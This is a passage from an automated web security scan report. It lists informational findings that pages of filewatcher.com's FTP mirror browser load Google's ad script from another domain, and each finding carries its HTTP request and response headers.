User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:49 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "Vl+kF1abiglQoVBS7/evTw"
Content-Length: 12714
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:49 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 552
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.946. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.4/packages.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.4/packages.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.4/packages.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:49 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "VfCZkla5r8qGX1gWzEXT1g"
Content-Length: 8593
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:49 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 558
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.947. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.4/packages/sparc.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.4/packages/sparc.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.4/packages/sparc.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:50 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "snazfcS18nFjt5bq+Mynhw"
Content-Length: 23036
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:50 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 558
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.948. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.4/packages/sparc64.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.4/packages/sparc64.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/OpenBSD/4.4/packages/sparc64.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:51 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "WRd+PU7IhxgnzeOV/D+Glg"
Content-Length: 21639
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:51 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 557
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.949. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-koeln.de.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:19 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "S+3D58ROosl2x6DjOwFrpw"
Content-Length: 15524
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:19 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 690
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/ - FTP Browser<
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.950. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de/mirrors.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-koeln.de/mirrors.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de/mirrors.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:23 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "VqBsx7f5MuLGpM6anxVZpw"
Content-Length: 6970
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:23 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 701
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/mirrors/ - FTP
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.951. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de/mirrors/redhat.com.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-koeln.de/mirrors/redhat.com.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de/mirrors/redhat.com.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:23 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ACDuSH5AM95QvmJOs04SdQ"
Content-Length: 5794
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:23 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 702
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/mirrors/redhat.
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.952. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:24 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "n7L5bkn3UV97j0Xx/Zi6tg"
Content-Length: 5599
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:24 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 707
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/mirrors/redhat.
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.953. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:24 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "P8Sjj54gHVrug3r3GUMWTA"
Content-Length: 5878
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:24 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 708
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/mirrors/redhat.
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.954. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:24 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "tCv6kuP0WeKNjutPbBLvMQ"
Content-Length: 8120
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:24 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 712
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/mirrors/redhat.
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.955. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1/en.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1/en.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1/en.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:25 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "+K90YVCs73jbcQkU25eruA"
Content-Length: 7246
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:25 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 712
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/mirrors/redhat.
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.956. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1/en/powertools.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1/en/powertools.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1/en/powertools.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:25 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "WpNCciUgGzegd3ji99CUwA"
Content-Length: 6359
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:25 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 713
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/mirrors/redhat.
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.957. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1/en/powertools/alpha.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1/en/powertools/alpha.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1/en/powertools/alpha.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:25 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "uCGZpM58zmFar9cZKWQ1Bw"
Content-Length: 7839
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:25 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 714
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/mirrors/redhat.
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.958. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1/en/powertools/alpha/RedHat.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1/en/powertools/alpha/RedHat.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1/en/powertools/alpha/RedHat.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:26 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "C7P/kA+shyMApW9Aoag99g"
Content-Length: 6308
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:26 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 717
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/mirrors/redhat.
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.959. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1/en/powertools/alpha/RedHat/RPMS.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1/en/powertools/alpha/RedHat/RPMS.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1/en/powertools/alpha/RedHat/RPMS.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:26 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "XVV02YRDLc1pBNwOc7+7wA"
Content-Length: 42054
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:26 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 721
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/mirrors/redhat.
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.960. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1/en/powertools/alpha/SRPMS.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1/en/powertools/alpha/SRPMS.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de/mirrors/redhat.com/redhat/linux/7.1/en/powertools/alpha/SRPMS.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:27 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "zeEfJNlJYjPsQTKc+zFIag"
Content-Length: 50034
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:27 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 722
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/mirrors/redhat.
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.961. http://www.filewatcher.com/b/ftp/ftp.uni-koeln.de/packages.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-koeln.de/packages.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-koeln.de/packages.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:20 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "8yB2lyJHdyp+pGidpYw00Q"
Content-Length: 5738
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:20 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 691
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-koeln.de/packages/ - FTP
...[SNIP]...
</script>
<script type="text/javascript"
